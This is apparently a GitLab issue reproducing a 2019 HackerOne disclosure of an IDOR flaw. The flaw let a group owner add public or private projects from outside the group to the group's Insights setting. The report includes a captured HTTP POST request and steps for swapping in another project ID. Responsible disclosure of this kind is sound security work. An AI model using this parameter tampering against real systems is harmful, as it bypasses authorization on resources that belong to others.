Add private/public projects in group Insights

HackerOne report #626394 by ashish_r_padelkar on 2019-06-23, assigned to jritchey:

Summary

Hello,

There is anew feature available in Groups at https://gitlab.com/groups/<GroupName>/-/edit called Insights

Screenshot_2019-06-23_at_17.24.55.png

In this, you can select the projects available with in a group. However, It is also possible to add public projects here or even a private projects which doesnt belong to this group using this bug!

Private project names are not visible though if you dont have access to it.

Steps to reproduce

  1. As a group owner, navigate to https://gitlab.com/groups/<GroupName>/-/edit -->Insights
  2. Select the available projects and save.
  3. Capture the below request.
POST /newgroup_t HTTP/1.1  
Host: gitlab.com  
Connection: close  
Content-Length: 223  
Cache-Control: max-age=0  
Origin: https://gitlab.com  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3  
Referer: https://gitlab.com/groups/newgroup_t/-/edit  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: 1

utf8=%E2%9C%93&_method=patch&authenticity_token=1&group[insight_attributes][id]=7&group[insight_attributes][project_id]=12862937

  1. Replace the value of group[insight_attributes][project_id] to any public/private project ID

  2. Send the request. If it is public project ID, then you should see the name when you reload. If its private then you will see blank but the project is added as you can verify using view source and you will find the project ID added to it.

What is the current bug behavior?

It is possible to add projects which doesn't belong to group in Insights section

What is the expected correct behavior?

Only project belongs to group should be allowed to add.

Output of checks

This bug happens on GitLab.com and may be on omnibus installations too!

Regards,
Ashish

Impact

While it's possible to add public /private project in Insight section using IDOR, i am not completely sure about its overall impact but fixing this might be useful for future bug cases that might occur because of this.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

Edited by Costel Maxim